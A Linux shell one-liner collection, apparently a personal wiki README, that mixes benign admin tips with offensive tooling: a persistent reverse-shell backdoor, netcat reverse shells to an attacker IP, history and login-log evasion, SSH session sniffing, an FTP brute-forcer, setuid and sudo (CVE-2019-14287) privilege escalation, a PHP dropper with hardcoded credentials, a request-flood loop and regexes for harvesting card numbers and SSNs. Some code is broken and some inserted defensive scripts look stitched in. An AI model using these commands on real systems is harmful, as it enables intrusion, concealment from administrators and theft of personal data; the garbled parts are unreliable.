# myBestOneLiners

And some other tips and tricks.

If you know a better or more efficient way to perform any of my one-liners, I would like to know how it can be done; I love learning new ways of doing things effectively and I love Linux. If you see something that is wrong or "negative", I also want to know; feel free to explain why as clearly as possible, AND I want to know how to do it the right "way". There are so many pitfalls; I want to do things the "right" way and get deeper into the "POSIX" way of doing things, so please contribute 🐧

If you cannot, then I hope I have contributed to you instead by sharing the knowledge.

You can copy and use my wiki as much as you want as long as you follow GPL v3.0, but IF you want to link to or share something from my wiki I would be happy if you link back to the wiki so more people can find it; the more we are, the better we can do this together.

All scripts are created by me personally (I will be clear about who the creator is and where I got a script from if it is not from me) and are licensed under GPL v3.0; this also applies to the scripts that appear without a header / author / title in the script.

Thank you for showing your respect and being honest, I'm passionate about freedom and freedom of speech!


My hardware used in previews:

Internet:
CPU Model: Intel(R) Xeon(R) CPU E5-2680 v3 @ 2.50GHz
CPU Cores: `printf '%s' $(nproc)` = 48

Use $((nproc + 1)) for the best performance; for threads I try to use $((nproc + 1)) x 2 for the best performance.

```sh
export NUMCPUS=$(nproc)
export NUMCPUSPLUSONE=$((NUMCPUS + 1))
export NUMTHREADS=$((NUMCPUSPLUSONE * 2))
```

And then:

```sh
parallel -j"${NUMCPUSPLUSONE}" -n"${NUMTHREADS}" ....
```

Try a Tor connection

```sh
curl --socks5 localhost:9050 \
     --socks5-hostname localhost:9050 \
```

Create a backdoor for reverse shell

```sh
nohup bash -c ' \
while :;do
   setsid bash -i &>/dev/tcp/$IP/$PORT 0>&1;
   sleep 3600;
done' &>/dev/null &
```

```sh
fuser /dev/shm/.busy &>/dev/null
if [ $? -eq 1 ]; then
nohup /bin/bash -c ' \
while :; do
    touch /dev/shm/.busy;
    exec 3</dev/shm/.busy;
    setsid bash -i &>/dev/tcp/$IP/$PORT ;
    sleep 3600;
done' &>/dev/null &
fi
```

Almost invisible SSH

Author: hackerschoice

This will not add your user to the /var/log/utmp file and you won't show up in the w or who listing of logged-in users. It will bypass .profile and .bash_profile as well. On your client side it will stop logging the host name to ~/.ssh/known_hosts.

```sh
ssh -o UserKnownHostsFile=/dev/null -T "bash -i"
```

Leave bash without history

Tell Bash to use /dev/null instead of ~/.bash_history. This is the first command we execute on every shell; it stops Bash from logging your commands.

```sh
export HISTFILE=/dev/null
```

Run commands hidden from admin

```sh
/bin/bash -c "exec ls"
```

Bash suicide

```sh
kill -9 $$
```

Warning: Program '/bin/bash' crashed.

Shred and wipe without shred

```sh
dd bs=1k count="`du -sk \"${FN}\"|cut -f1`" if=/dev/urandom >"${FN}";
rm -f "${FN}"
```

Sniff a user's SSH session with strace

```sh
strace -e trace=read -p <PID> 2>&1 \
    |while read x; do echo "$x" \
    |grep '^read.*= [1-9]$' \
    |cut -f2 -d\";
    done
```

Check if a port is open or closed in pure Bash

```sh
( echo > /dev/tcp/; ) &> /dev/null
if [[ $? = "0" ]]; then echo "up"; else echo "down"; fi
```

```sh
( : <> /dev/tcp/;) \
    &> /dev/null 1>&2 \
    && echo "up" \
    || echo "closed"
```

Browse to a site in pure Bash

```sh
exec 5<>/dev/tcp/
echo -e "GET / HTTP/1.0\n" >&5
cat <&5
```

Run last command again

Below will open your editor and paste the last 20 commands you used in the CLI

```sh
fc -1 -20
```

Clone starred GitHub repos in parallel with unlimited speed (clone 20 repos in parallel).

With xargs:

```sh
curl "${GITUSER}/starred?per_page=1000" \
    |grep -o 'git@[^"]*' \
    |xargs -P20 -L1 git clone
```

With GNU parallel:

```sh
curl "${GITUSER}/starred?per_page=1000" \
    |grep -o 'git@[^"]*' \
    |parallel -j 25 'git clone {}'
```

Really fast port scanner with colorized output:

65535 ports scanned in ~3.5s

```sh
seq 65535 | \
    parallel \
        -k --joblog portscan \
    -j9 \
    --pipe \
    --cat \
    -j200% \
    -n9000 \
    --tagstring '\033[30;3{=$_=++$::color%8=}m' \
    'nc -vz localhost $(head -n1 {})-$(tail -n1 {})'
```

Bruteforce two FTP accounts at once

```sh
# Author: wuseman
# Desc: Bruteforce 2 accounts at once

okMSG() {
    echo -e "[\e[1;32m*\e[0m] $*"

errMSG() {
    echo -e "[\e[1;31m*\e[0m] $*"

1() {
    curl ftp://host:port -u $line &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line" || errMSG "Bad password for $line"

2() {
    curl ftp://host:port -u $line1 &> /dev/null -u $line1 &> /dev/null
    [[ $? = "0" ]] &&  okMSG "Cracked password for $line1" || errMSG "Bad password for $line1"

    read line;read line1;
    1;2;sleep 0.1;
done < test
```

Download files fast as ****:

```sh
time seq 1000|parallel -a 1 -j1000 wget
```

Exploit Cronie - if a script is running with higher privileges

```sh
echo "cat /challenge/app-script/ch4/.passwd >/tmp/cracked" > \
    cron.d/go && chmod a+x cron.d/go \
    && sleep 60 && \
    cat /tmp/cracked
```

Fix broken SSH permissions for the client

```sh
chmod 700 ~/.ssh
chmod 644 ~/.ssh/authorized_keys
chmod 644 ~/.ssh/known_hosts
chmod 644 ~/.ssh/config
chmod 600 ~/.ssh/id_rsa
chmod 644 ~/.ssh/
chmod 600 ~/.ssh/github_rsa
chmod 644 ~/.ssh/
chmod 600 ~/.ssh/mozilla_rsa
chmod 644 ~/.ssh/
```
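As an added example (not from the original page), here is an audit function that reports which files in an ~/.ssh-style directory are more open than the modes above, instead of resetting them blindly. It assumes GNU stat (-c '%a') and takes the directory as a parameter so it can be run against a test copy.

```sh
# Added example: audit the mode bits of an ~/.ssh-style directory.
# Prints one line per file that is wider than expected and returns 1 if
# anything was reported, 0 otherwise. Assumes GNU stat (-c '%a').
audit_ssh_dir() {
    dir=$1
    bad=0
    # want_mode PATH MAX_MODE: report if PATH has any permission bit that
    # MAX_MODE does not have (a stricter mode, e.g. 600 instead of 644, is fine)
    want_mode() {
        actual=$(stat -c '%a' "$1") || return 0
        if [ $(( 0$actual & ~0$2 )) -ne 0 ]; then
            printf '%s: mode %s, wider than %s\n' "$1" "$actual" "$2"
            bad=1
        fi
    }
    want_mode "$dir" 700
    for f in "$dir"/*; do
        [ -e "$f" ] || continue            # empty directory: glob stays literal
        case ${f##*/} in
            *.pub|authorized_keys|known_hosts|config) want_mode "$f" 644 ;;
            id_*|*_rsa|*_ed25519|*_ecdsa)             want_mode "$f" 600 ;;
            *) ;;                                     # unknown file: not checked
        esac
    done
    return $bad
}

# Usage: audit_ssh_dir ~/.ssh || echo "fix the permissions reported above"
```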

Find shells that are not used in /etc/passwd, and list all users

```sh
for shell in $(</etc/shells); do
  count=$(grep -c "$shell" /etc/passwd)
  if [ "$count" -eq 0 ]; then echo "$shell not used in /etc/passwd"; fi
done
```

List all users (equivalent ways):

```sh
getent passwd | awk -F ':' '{print $1}' > allusers

cut -d: -f1 /etc/passwd
sed 's/:.*//' /etc/passwd
awk -F: '{print $1}' /etc/passwd
```
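The loop above greps each word of /etc/shells (comment lines included) anywhere in /etc/passwd, so /bin/sh also "matches" /usr/local/bin/sh. As an added example (not from the original page), this version compares the login-shell field exactly and skips comments; both file paths are parameters so it can be run against copies.

```sh
# Added example: list the login shells from a shells(5)-style file that no
# account in a passwd(5)-style file uses. Field 7 of passwd is compared
# exactly, and comment or blank lines in the shells file are skipped.
unused_shells() {
    shells_file=$1
    passwd_file=$2
    awk -F: -v pw="$passwd_file" '
        # first file (shells): remember each real entry, in order, once
        FNR == NR {
            if ($0 ~ /^[[:space:]]*(#|$)/) next
            if (!($0 in seen)) { seen[$0] = 0; order[++n] = $0 }
            next
        }
        # second file (passwd): field 7 is the login shell
        ($7 in seen) { seen[$7]++ }
        END {
            for (i = 1; i <= n; i++)
                if (seen[order[i]] == 0) print order[i] " not used in " pw
        }
    ' "$shells_file" "$passwd_file"
}

# Usage (when run as a script with two arguments): unused_shells /etc/shells /etc/passwd
if [ $# -eq 2 ]; then unused_shells "$1" "$2"; fi
```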

C program to get a shell

```c
#include <stdlib.h>
#include <unistd.h>

int main() {
    setresuid(1028, 1028, 1028);
    setresuid(1028, 1028, 1028);
    return 0;
}
```

```sh
gcc -o /tmp/pwned /tmp/._cron/shell.c
chmod +s /tmp/pwned
chmod a+rwx /tmp/pwned
```

If you need to kill a specific process using a given port

```sh
fuser -k 445/tcp
```

Broadcast your shell through port 5000

```sh
bash -i 2>&1 | tee /dev/stderr | nc -l 5000
```

You can use the following trick to easily navigate and select paths

```sh
mkdir fooPath && cd $_
```

Fastest segmented parallel sync of a remote directory over SSH

```sh
lftp -u user,pwd -e "set sftp:connect-program 'ssh -a -x -T -c arcfour -o Compression=no'; \
mirror -v -c --loop --use-pget-n=3 -P 2 /remote/dir/ /local/dir/; quit" sftp://remotehost:22
```

Find dupe files and colorize output:

```sh
find /glftpd/site/archive -type f | \
    grep -E '[0-9]{1,9}\.[^.]+$' | parallel -n1 -j200% md5sum | \
    awk 'x[$1]++ { print $2 " :::"}' |  \
    sed 's/^/Dupe: /g' | \
    sed 's,Dupe,\x1B[31m&\x1B[0m,'
```

Create a progress bar over the entire window until we count to 1000

```sh
seq 1000 |parallel -j30 --bar '(echo {};sleep 0.1)'
```

Ports we probably want to set as accepted in our iptables chains

```sh
lsof -i -nlP|awk '{print $9, $8, $1}'|sed 's/.*://'|sort -u
```

To add those ports to iptables:

```sh
lsof -i -nlP|awk '{print $9}'|sed 's/.*://'|sort -u|column -t | \
    sed 's/^/iptables -A INPUT -p TCP --dport /g' \
    |sed 's/$/ -m state --state NEW -j ACCEPT/g'
```

Remote addresses of established connections:

```sh
netstat -lantp | grep ESTABLISHED |awk '{print $5}' | awk -F: '{print $1}' | sort -u
```

```c
#include <stdlib.h>

int main(void)
{
        system("ls /path/to/.passwd");
        return 0;
}
```

```sh
ln -s /bin/cat /tmp/ls
ls -l /tmp/ls
echo $PATH
```

```sh
echo -e "URL Title: $(curl -s $1|grep -i title|cut -d'<' -f2|cut -d'>' -f2)"
```

Create a UEFI bootable USB:

```sh
parted /dev/sdc -s print
mkfs.vfat -F 32 /dev/<device>1
mount /dev/<device>1 /<dev_mountpoint>
mount /path/to/iso/Win10_1511_1_<Version>_<Language>_x64.iso /<iso_mountpoint>
cp -R /<iso_mountpoint>/* /<dev_mountpoint>/
printf '%s' "Done"
```

Set up efibootmgr

You should know how to edit this line; otherwise, see man efibootmgr.

```sh
efibootmgr -d /dev/sda -p 2 -c -L "Gentoo Linux" -l /vmlinuz-5.4.97-gentoo-x86_64 -u "cryptdevice=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8:latitude-rootfs root=UUID=80bf5e3b-c34f-4917-b7e8-6733909ef5a8 rw initrd=/initramfs-5.4.97-gentoo-x86_64.img"
```

Run 10 curl commands in parallel via xargs

```sh
NUM="10";time seq ${NUM}|time xargs -I % -n1 -P${NUM} curl -sL
```

CPU idle and used percentage from /proc/stat:

```sh
grep "cpu " /proc/stat | awk -F ' ' '{total = $2 + $3 + $4 + $5} END {print "idle \t used\n" $5*100/total "% " $2*100/total "%"}'
```

KDF rounds (ssh-keygen -a): slower is better, as slow as you can tolerate. Timing for different -a values, each measured 20 times:

```sh
for j in 16 32 64 100 150; do
    echo -n "-a $j takes on average ";
    for i in {1..20}; do
        ssh-keygen -qa $j -t ed25519 -f test -N test;
        time ssh-keygen -qa $j -N tost -pP test -f test;
        rm test{.pub,};
    done |& grep real | awk -F m '{print $2}' | tr -d s | awk '{sum+=$1} END{print sum/NR}';
done
```

Print every thermal zone with its temperature:

```sh
paste <(cat /sys/class/thermal/thermal_zone*/type) \
      <(cat /sys/class/thermal/thermal_zone*/temp) \
    |column -s $'\t' -t \
    |sed 's/\(.\)..$/.\1°C/'
```

```sh
for zone in $(ls /sys/class/thermal/ | grep thermal_zone); do
    echo -n "$(cat /sys/class/thermal/${zone}/type): "
    cat /sys/class/thermal/$zone/temp | sed 's/\(.\)..$/.\1°C/'
done
```

Flashing text:

```sh
flashing_text () {
  wuzi='*w*u*s*e*m*a*n*_*p*w*n*z \e[00;34m !';
  for i in {0..59}; do
      echo -ne "\r${wuzi:0:$i}" ;sleep 0.05;
  done
}
```

Current processor speed:

```sh
awk -F": " '/cpu MHz\ */ { print "Processor (or core) running speed is: " $2 }' /proc/cpuinfo ;
dmidecode | awk -F": " '/Current Speed/ { print "Processor real speed is: " $2 }'
```

Some distro-checker commands I have used over the years in my scripts

```sh
distro=$(cat /etc/os-release|head -n 1|cut -d'=' -f2|sed 's/"//g'| awk '{print tolower($0)}')
distro2="$(cat /etc/issue | head -n +1 | awk '{print $1}')"
distro3="$(tr -s ' \011' '\012' < /etc/issue | head -n 1)"
distro4="$(cat /etc/issue | head -n +1 | awk '{print $1}')"
distro5="$(cat /etc/os-release | grep "PRETTY_NAME" | sed 's/PRETTY_NAME=//g' | sed 's/["]//g' | awk '{print $1}')"
awk -F'"' '/NAME/ {print tolower($2)} /NR=2/' /etc/os-release|head -n 1
```
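The chains above depend on line order (NAME is not guaranteed to be the first line of os-release) and on values having no spaces. As an added example (not from the original page), this function reads any os-release(5) key by name and strips the optional quotes; the file path is a parameter so it can be run against a constructed copy.

```sh
# Added example: os_release_get KEY [FILE]
# Prints the value of KEY from an os-release(5) file (default /etc/os-release)
# with surrounding quotes removed, or "unknown" if the key is absent.
# Returns 1 if the file cannot be read.
os_release_get() {
    key=$1
    file=${2:-/etc/os-release}
    [ -r "$file" ] || { echo unknown; return 1; }
    awk -F= -v key="$key" '
        $1 == key {
            val = substr($0, length(key) + 2)    # everything after KEY=
            gsub(/^["'\'']|["'\'']$/, "", val)   # strip one pair of quotes
            print val; found = 1; exit
        }
        END { if (!found) print "unknown" }
    ' "$file"
}

# Usage: distro=$(os_release_get ID); version=$(os_release_get VERSION_ID)
```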

Get your monitor/screen model

```sh
while read -r output hex conn; do
    [[ -z "$conn" ]] && conn=${output%%-*}
    echo "# $output $conn   $(xxd -r -p <<< "$hex")"
done < <(xrandr --prop | awk '
    !/^[ \t]/ {
        if (output && hex) print output, hex, conn
        output=$1
        hex=""
    }
    /ConnectorType:/ {conn=$2}
    /[:.]/ && h {
        sub(/.*000000fc00/, "", hex)
        hex = substr(hex, 0, 26) "0a"
        sub(/0a.*/, "", hex)
        h=0
    }
    h {sub(/[ \t]+/, ""); hex = hex $0}
    /EDID.*:/ {h=1}
    END {if (output && hex) print output, hex, conn}
    ' | sort)
```

Simple IFS example

```sh
bash -c 'set a b c d; IFS="+-;"; echo "$*"'
```

Date script to print days, hours, minutes and seconds between two dates

```sh
then=$(date -u -d "2014-10-25 00:00:00" +%s)
now=$(date -u +%s)
date -u -d "2014-01-01 $now sec - $then sec" +"%j days %H hours %M minutes and %S seconds"
```

Convert a magnet URL to a torrent file

```sh
[[ "$1" =~ xt=urn:btih:([^&/]+) ]] || exit;
echo "d10:magnet-uri${#1}:${1}e" > "meta-${BASH_REMATCH[1]}.torrent"
```

Check hard drive space and print green or red depending on whether our threshold is reached

```sh
HDFREE=$(df -h|egrep "[0-9].*\/$"|awk '{print $5}'|sed 's/%//g')

if [[ $HDFREE -lt 50 ]]; then
    echo -e "Your shared hard drive is \e[1;31m${HDFREE}%\e[0m full"
else
    echo -e "Your shared hard drive is \e[1;32m${HDFREE}%\e[0m full"
fi
```

How I grab valuable stuff from APK files (extracted)

```sh
grep -EHirn "accesskey|admin|aes|api_key|apikey|checkClientTrusted|crypt|http:|https:|password\
|pinning|secret|SHA256|SharedPreferences|superuser|token|X509TrustManager \
|insert into" APKfolder/
```

Get sensor data without any info

```sh
cat /sys/class/thermal/thermal_zone*/temp
```

Resize all JPG images to 50% of the original size

```sh
find . -maxdepth 1 -iname "*.jpg" | xargs -L1 -I{} convert -resize 50% "{}" _half/"{}"
```

Find IOMMU groups

```sh
for d in /sys/kernel/iommu_groups/*/devices/*; do
    n=${d#*/iommu_groups/*}; n=${n%%/*};
    printf 'IOMMU Group %s ' "$n";
    lspci -nns "${d##*/}";
done
```

Use curl like a pro

Do It Once

```sh
seq 1 | parallel -n0 "curl -H 'Content-Type: application/json' -X POST \
    -d '{\"url\":\"\"}'"
```

Do It Twice

```sh
seq 2 | parallel -n0 "curl -H 'Content-Type: application/json' -X POST \
    -d '{\"url\":\"\"}'"
```

Do It 4 Times, But At 2 At A Time

```sh
seq 4 | parallel -n0 -j2 "curl -H 'Content-Type: application/json' -X POST -d '{\"url\":\"\"}'"
```

More parallel tricks for curl

```sh
seq 1 | parallel -n0 curl \
    "http --ignore-stdin POST url="
```

Continue forever until we press ctrl+c (100 at a time)

Before we do it again, wait for all tasks to complete; then we start over.

```sh
target=${1:-$(cat 1)}
while true; do
    for i in $(seq 100); do curl "$target" > /dev/null & done
    wait
done
```

Check if a zip or a rar file has password protection

If you need to check whether a zip or rar file has password protection you can do it this way.

ZIP:

```sh
crypted=$(7z l -slt -- "$file" | grep -i -c "Encrypted = +")
if [ "$crypted" -eq "1" ]; then
    echo "$file is password-protected"
fi
```

Unrar:

```sh
unrar x -p- -y -o+ "$file" 1> /dev/null 2> /dev/null
if [ "$?" -eq "3" ] ; then
    unrar x -p$password -y -o+ "$file" 1> /dev/null 2> /dev/null
fi
```

Make changes in .bashrc immediately available

```sh
bashrc-reload() {
    builtin unalias -a; builtin unset -f $(builtin declare -F | \
     sed 's/^.*declare[[:blank:]]\+-f[[:blank:]]\+//');
    source ~/.bashrc;
}
```

Delete static and dynamic ARP entries for a /24 subnet

```sh
for i in {1..254}; do
    arp -d 192.168.0.$i;
done
```

Preserve your fingers from cd ..; cd ..; cd ..; cd ..;

```sh
up() {
    DEEP=$1
    for i in $(seq 1 ${DEEP:-"1"}); do cd ../; done
}
```

Get the executed script's current working directory

```sh
CWD=$(cd "$(dirname "$0")" && pwd)
```

Scan all open ports without any required program

```sh
for i in {1..65535}; do
    (echo < /dev/tcp/$i) &>/dev/null && \
    printf "\n[+] Open Port at\n: \t%d\n" "$i" \
    || printf ".";
done
```

Create txt files with 10000 rows

```sh
for FILE in *.full ; do
    split -l 100000 $FILE; mv -f xaa `echo "$FILE" \
    | cut -d'.' -f1`.txt; rm -f x*;
done
```

File transfer as a PRO

```sh
ftp -n IP <<END_SCRIPT
quote USER acknak
quote PASS jLQRZy4gyLhmMqz2whTw
exit 0
END_SCRIPT
```

This can also be done over PHP

```php
<?php echo shell_exec("echo open 21>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo user acknak jLQRZy4gyLhmMqz2whTw>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo binary>> /usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo get netcat /usr/local/databases/netcat>>/usr/local/databases/ftp.txt");?>
<?php echo shell_exec("echo bye>> /usr/local/databases/ftp.txt");?>

<?php echo shell_exec("ftp -n < /usr/local/databases/ftp.txt");?>
```

Escaping shells

```sh
echo FREEDOM! && cd () bash && cd
```

tar can read all files, so you can create a tar with a wanted file and then extract it

```sh
tar -cvf shadow.tar "/etc/shadow"
tar -xvf shadow.tar
cat etc/shadow
```

Netcat without -e

A lot of machines have netcat installed (for example macOS) but it is not usable for reverse shells. However, with this it becomes usable.

```sh
mknod /tmp/backpipe p; /bin/sh 0</tmp/backpipe | nc <ATTACKER IP> <PORT> 1>/tmp/backpipe
```

Overcome limited shells

Some payloads to overcome limited shells

```sh
ssh user@$ip nc $localip 4444 -e /bin/sh
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux
```

#### Bash

```sh
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";
```

```sh
perl -e 'exec "/bin/sh";'
```

```sh
# /bin/dash is the only shell to keep the sticky bit, so if you run as root (included cron, or services running as root):
install -mode 4755 /bin/dash /tmp/sh
# Then you will have a /tmp/sh that gives any user who calls it root !
```
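From the defender's side the setuid-copy trick above is easy to catch: a setuid or setgid file in a writable scratch directory is almost never legitimate. As an added example (not from the original page), these functions inventory such files under the given directories and report only the ones missing from a previously saved baseline; they assume GNU find (-printf) and take every path as a parameter.

```sh
# Added example: inventory setuid/setgid files and diff against a baseline.
# list_setuid DIR...          -> sorted "mode uid path" lines (GNU find assumed)
# new_setuid BASELINE DIR...  -> only the lines not already in BASELINE
# Typical use: save list_setuid / > setuid.baseline once, then run
# new_setuid setuid.baseline / /tmp /dev/shm from cron and alert on any output.
list_setuid() {
    find "$@" -xdev -type f \( -perm -4000 -o -perm -2000 \) \
        -printf '%m %U %p\n' 2>/dev/null | LC_ALL=C sort
}

new_setuid() {
    baseline=$1
    shift
    # comm needs both inputs sorted the same way; -13 keeps lines only in input 2
    list_setuid "$@" | LC_ALL=C comm -13 "$baseline" -
}
```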

Abusing sudo rights (CVE-2019-14287)

Exploitable when a user has the following permissions (sudo -l):

```
(ALL, !root) ALL
```

If you have a full TTY, you can exploit it like this:

```sh
sudo -u#-1 /bin/bash
```

If there is no TTY, you can restart the SSH server and add your key:

```sh
sudo /etc/init.d/ssh restart
echo 'ssh-rsa AAAA[...snip...]fd48as= root@kali-jms' > authorized_keys
sudo -u#-1 bash
```



Extract credit card numbers

Visa

```sh
grep -E -o "4[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > visa.txt
```

MasterCard

```sh
grep -E -o "5[0-9]{3}[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > mastercard.txt
```

American Express

```sh
grep -E -o "\b3[47][0-9]{13}\b" *.txt > american-express.txt
```

Diners Club

```sh
grep -E -o "\b3(?:0[0-5]|[68][0-9])[0-9]{11}\b" *.txt > diners.txt
```

Discover

```sh
grep -E -o "6011[ -]?[0-9]{4}[ -]?[0-9]{4}[ -]?[0-9]{4}" *.txt > discover.txt
```

JCB

```sh
grep -E -o "\b(?:2131|1800|35d{3})d{11}\b" *.txt > jcb.txt
```

Amex

```sh
grep -E -o "3[47][0-9]{2}[ -]?[0-9]{6}[ -]?[0-9]{5}" *.txt > amex.txt
```

Extract IDs

Extract Social Security Number (SSN)

```sh
grep -E -o "[0-9]{3}[ -]?[0-9]{2}[ -]?[0-9]{4}"
```

Extract Indiana Driver License Number

```sh
grep -E -o "[0-9]{4}[ -]?[0-9]{2}[ -]?[0-9]{4}"
```

Extract US Passport Cards

```sh
grep -E -o "C0[0-9]{7}"
```

Extract US Passport Number

```sh
grep -E -o "[23][0-9]{8}"
```

Extract US Phone Numbers

```sh
grep -Po 'd{3}[s-_]?d{3}[s-_]?d{4}'
```

Extract ISBN Numbers

```sh
grep -a -o "\bISBN(?:-1[03])?:? (?=[0-9X]{10}$|(?=(?:[0-9]+\
[- ]){3})[- 0-9X]{13}$|97[89][0-9]{10}$|(?=(?:[0-9]+[- ])\
{4})[- 0-9]{17}$)(?:97[89][- ]?)?[0-9]{1,5}[- ]?[0-9]+[- ]?[0-9]+[- ]?[0-9X]\b"
```

